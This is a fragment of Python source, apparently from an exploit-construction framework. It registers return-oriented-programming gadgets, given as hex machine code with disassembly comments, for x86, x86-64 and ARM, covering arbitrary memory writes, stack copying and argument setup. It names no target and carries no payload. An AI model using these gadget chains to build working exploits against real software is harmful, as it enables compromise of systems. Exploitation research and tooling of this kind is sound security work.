def __init__(self):
Exploit.__init__(self)
# Good for FreeBSD
# self.add_gadget("EM_386", "writemem", 4,
# " 8b 44 24 08" + # mov eax,DWORD PTR [esp+0x8] \
# " 8b 4c 24 04" + # mov ecx,DWORD PTR [esp+0x4] \
# " 89 01" + # mov DWORD PTR [ecx],eax \
# " c3") # ret
# self.add_gadget("EM_386", "cleanup", 3,
# " 83 c4 0c" + # add esp,0xc \
# " c3") # ret
# Good for Linux
self.add_gadget("EM_386", "writemem", 4,
" 8b 54 24 08" + # mov edx,DWORD PTR [esp+0x8] \
" 8b 44 24 04" + # mov eax,DWORD PTR [esp+0x4] \
" 89 10" + # mov DWORD PTR [eax],edx \
" c3") # ret
# *(*(eax)+ecx) = ebx
self.add_gadget("EM_386", "deref_write_with_offset", 4,
" 58" + # pop eax \
" 5b" + # pop ebx \
" 59" + # pop ecx \
" 8b 00" + # mov eax,DWORD PTR [eax] \
" 89 1c 08" + # mov DWORD PTR [eax+ecx*1],ebx \
" c3") # ret
self.add_gadget("EM_386", "deref_with_offset_and_save", 4,
" 58" + # pop eax \
" 5b" + # pop ebx \
" 59" + # pop ecx \
" 8b 00" + # mov eax,DWORD PTR [eax]
" 8b 04 18" + # mov eax,DWORD PTR [eax+ebx*1] \
" 89 01" + # mov DWORD PTR [ecx],eax \
" c3") # ret
self.add_gadget("EM_386", "copy_to_stack", 4,
" 5b" + # pop ebx \
" 59" + # pop ecx \
" 8b 1b" + # mov ebx,DWORD PTR [ebx] \
" 89 1c 0c" + # mov DWORD PTR [esp+ecx*1],ebx \
" c3") # ret
self.add_gadget("EM_386", "cleanup", 4,
" 5b" + # pop ebx \
" 5e" + # pop esi \
" 5f" + # pop edi \
" 5d" + # pop ebp \
" c3") # ret
self.add_gadget("EM_386", "prepare_memcpy", 4,
" 58" + # pop eax \
" 5e" + # pop esi \
" 01 e6" + # add esi,esp \
" 89 34 04" + # mov DWORD PTR [esp+eax*1],esi \
" c3") # ret
self.add_gadget("EM_386", "custom_cleanup", 4,
" 5b" + # pop ebx \
" 01 dc" + # add esp,ebx \
" c3") # ret
# This gadget requires 6 useless parameters
self.add_gadget("EM_X86_64", "writemem", 8,
" 48 8b 54 24 10" + # mov rdx,QWORD PTR [rsp+0x10] \
" 48 8b 44 24 08" + # mov rax,QWORD PTR [rsp+0x8] \
" 48 89 10" + # mov QWORD PTR [rax],rdx \
" c3") # ret
self.add_gadget("EM_X86_64", "writemem", 8,
" 48 89 37" + # mov QWORD PTR [rdi],rsi \
" c3") # ret
self.add_gadget("EM_X86_64", "cleanup", 6,
" 5b" + # pop rbx \
" 5d" + # pop rbp \
" 41 5c" + # pop r12 \
" 41 5d" + # pop r13 \
" 41 5e" + # pop r14 \
" 41 5f" + # pop r15 \
" c3") # ret
self.add_gadget("EM_X86_64", "args", None,
" 4c 89 ea" + # mov rdx,r13 \
" 4c 89 f6" + # mov rsi,r14 \
" 44 89 ff" + # mov edi,r15d \
" 41 ff 14 dc") # call QWORD PTR [r12+rbx*8]
self.add_gadget("EM_X86_64", "deref_write_with_offset", None,
" 58" + # pop rax \
" 5b" + # pop rbx \
" 59" + # pop rcx \
" 48 8b 00" + # mov rax,QWORD PTR [rax] \
" 48 89 1c 08" + # mov QWORD PTR [rax+rcx*1],rbx \
" c3") # ret
self.add_gadget("EM_X86_64", "deref_with_offset_and_save", None,
" 58" + # pop rax \
" 5b" + # pop rbx \
" 59" + # pop rcx \
" 48 8b 00" + # mov rax,QWORD PTR [rax] \
" 48 8b 04 18" + # mov rax,QWORD PTR [rax+rbx*1] \
" 48 89 01" + # mov QWORD PTR [rcx],rax \
" c3") # ret
self.add_gadget("EM_X86_64", "copy_to_stack", None,
" 5b" + # pop rbx \
" 59" + # pop rcx \
" 48 8b 1b" + # mov rbx,QWORD PTR [rbx] \
" 48 89 1c 0c" + # mov QWORD PTR [rsp+rcx*1],rbx \
" c3") # ret
self.add_gadget("EM_X86_64", "prepare_memcpy", None,
" 5e" + # pop rsi \
" 48 01 e6" + # add rsi,rsp \
" c3") # ret
self.add_gadget("EM_X86_64", "custom_cleanup", None,
" 58" + # pop rax \
" 48 01 c4" + # add rsp,rax \
" c3") # ret
self.add_gadget("EM_X86_64", "prepare_easy", None,
" 5f" + # pop rdi \
" 5e" + # pop rsi \
" 5a" + # pop rdx \
" c3") # ret
# Assume LE
self.add_gadget("EM_ARM", "writemem", 4,
" 00 10 80 e5" + # str r1, [r0] \
" 1e ff 2f e1") # bx lr
# Better not use this due to a bug in QEMU
#self.add_gadget("EM_ARM", "prepare_regs", None,
# " f8 85 bd e8") # pop {r3, r4, r5, r6, r7, r8, sl, pc}
self.add_gadget("EM_ARM", "prepare_regs", None,
" f8 85 bd 08") # popeq {r3, r4, r5, r6, r7, r8, sl, pc}
self.add_gadget("EM_ARM", "setup_args", None,
" 07 00 a0 e1" + # mov r0, r7 \
" 08 10 a0 e1" + # mov r1, r8 \
" 0a 20 a0 e1" + # mov r2, sl \
" 01 40 84 e2" + # add r4, r4, #1 \
" 33 ff 2f e1" + # blx r3 \
" 06 00 54 e1" + # cmp r4, r6 \
" f7 ff ff 1a" + # bne 8604 <__libc_csu_init+0x38> \
" f8 85 bd e8") # pop {r3, r4, r5, r6, r7, r8, sl, pc}
self.add_gadget("EM_ARM", "just_ret", None,
" 1e ff 2f e1") # bx lr
def __init__(self):
Exploit.__init__(self)
self.empty_exploit = lambda: []